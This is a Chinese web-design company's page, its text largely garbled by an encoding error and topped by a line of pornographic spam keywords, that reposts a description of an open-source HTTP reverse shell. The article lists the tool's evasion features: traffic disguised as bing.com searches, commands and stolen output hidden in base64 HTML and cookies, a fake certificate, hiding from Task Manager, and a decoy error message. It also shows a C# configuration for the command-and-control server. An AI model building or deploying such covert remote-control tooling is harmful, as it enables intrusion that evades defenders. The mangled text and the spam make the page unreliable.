亚洲一二区制服无码中字,国产无套露脸在线观看,中文字幕丝袜人妻制服丝袜在线,国内精品自线在拍2020不卡,香蕉影院在线观看

您的位置:首頁(yè) > 新聞 > 推廣

使用HTTP協(xié)議的異步反向Shell/反彈Shell
推廣 2023-12-29編輯:重慶網(wǎng)站建設(shè)標(biāo)簽: WordPress 反彈 協(xié)議

HTTP異步反向Shell

有很多方法可以創(chuàng)建反向shell,以便能夠通過(guò)防火墻遠(yuǎn)程控制計(jì)算機(jī)。確實(shí),傳出連接并不總是被過(guò)濾。

但是,安全軟件和硬件(IPS,IDS,Proxy,AV,EDR等)功能越來(lái)越強(qiáng)大,可以檢測(cè)到這些攻擊。在大多數(shù)情況下,通過(guò)TCP或UDP隧道建立與反向Shell的連接。我認(rèn)為最好的檢測(cè)方法是使它看起來(lái)像合法流量。HTTP協(xié)議是標(biāo)準(zhǔn)用戶(hù)最常使用的協(xié)議。而且,它幾乎從未被過(guò)濾,以免阻止訪(fǎng)問(wèn)網(wǎng)站。

怎么運(yùn)行的 ?

  1. 客戶(hù)端應(yīng)用程序在目標(biāo)計(jì)算機(jī)上執(zhí)行。
  2. 客戶(hù)端啟動(dòng)與服務(wù)器的連接。
  3. 服務(wù)器接受連接。

然后:

  1. 客戶(hù)端查詢(xún)服務(wù)器,直到獲得指示。
  2. 攻擊者向服務(wù)器提供指令。
  3. 定義命令后,客戶(hù)端將執(zhí)行該命令并返回結(jié)果。

依此類(lèi)推,直到攻擊者決定結(jié)束會(huì)話(huà)為止。

特征

實(shí)現(xiàn)了以下功能:

  1. 偽造的HTTP流量顯示為在bing.com上的搜索。
  2. 命令在HTML響應(yīng)中以base64編碼。
  3. 客戶(hù)端將命令的結(jié)果編碼為base64中的cookie。
  4. [可選] SSL支持;默認(rèn)情況下,它是偽造的bing.com證書(shū)。
  5. 每個(gè)客戶(hù)端調(diào)用之間的隨機(jī)延遲,以避免觸發(fā)IDS。
  6. 服務(wù)器的每個(gè)響應(yīng)都使用隨機(jī)模板。
  7. 重新使用相同的Powershell流程,以避免觸發(fā)EDR。
  8. 支持所有Cmd和Powershell命令。
  9. [可選]客戶(hù)端可以在啟動(dòng)時(shí)顯示偽造的錯(cuò)誤消息。
  10. 客戶(hù)端從任務(wù)管理器中隱藏。
  11. [可選]客戶(hù)端可以管理員身份運(yùn)行。

使用示例

客戶(hù)端

服務(wù)端

有一些配置參數(shù)可以在HARS.sln中的Config.cs修改。

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 class Config ????{ ????????/* Behavior */ ????????// Display a fake error msg at startup ????????public static bool DisplayErrorMsg = true; ????????// Title of fake error msg ????????public static string ErrorMsgTitle = "This application could not be started."; ????????// Description of fake error msg ????????public static string ErrorMsgDesc = "Unhandled exception has occured in your application. rr Object {0} is not valid."; ????????// Min delay between the client calls ????????public static int MinDelay = 2; ????????// Max delay between the client calls ????????public static int MaxDelay = 5; ????????// Fake uri requested - Warning : it must begin with "search" (or need a change on server side) ????????public static string Url = "search?q=search+something&qs=n&form=QBRE&cvid="; ????????/* Listener */ ????????// Hostname/IP of C&C server ????????public static string Server = "https://127.0.0.1"; ????????// Listening port of C&C server ????????public static string Port = "443"; ????????// Allow self-signed or "unsecure" certificates - Warning : often needed in corporate environment using proxy ????????public static bool AllowInsecureCertificate = true; ????}

更多文檔直接看項(xiàng)目說(shuō)明。

項(xiàng)目地址:https://github.com/onSec-fr/Http-Asynchronous-Reverse-Shell

服務(wù)范圍:整站優(yōu)化、站內(nèi)優(yōu)化、外貿(mào)網(wǎng)站優(yōu)化、K站恢復(fù)
服務(wù)優(yōu)勢(shì):10年優(yōu)化SEO經(jīng)驗(yàn),上詞穩(wěn)定,達(dá)標(biāo)率高、費(fèi)用低
其它服務(wù):網(wǎng)站建設(shè)、企業(yè)郵箱、數(shù)字證書(shū)ssl、400電話(huà)、
聯(lián)系方式:電話(huà):18696588163 微信同號(hào)

WordPress,反彈,協(xié)議,WordPress,反彈,協(xié)議相關(guān)推薦預(yù)約建網(wǎng)站

聯(lián)系我們 MORE+
網(wǎng)站建設(shè)公司聯(lián)系方式
  • 電話(huà):18696588163
  • 坐機(jī):18696588163
  • 郵箱:[email protected]
  • 地址:重慶渝中區(qū)新華路4號(hào)
  • 重慶安菲科技有限公司
重慶網(wǎng)站建設(shè)公司
24小時(shí)服務(wù)熱線(xiàn) 18696588163
創(chuàng)意化數(shù)字品牌整合網(wǎng)絡(luò)營(yíng)銷(xiāo)
營(yíng)銷(xiāo)網(wǎng)站讓你坐等商機(jī)坐傭客戶(hù),Rss

版權(quán)所有:重慶安菲科技有限公司

友情鏈接: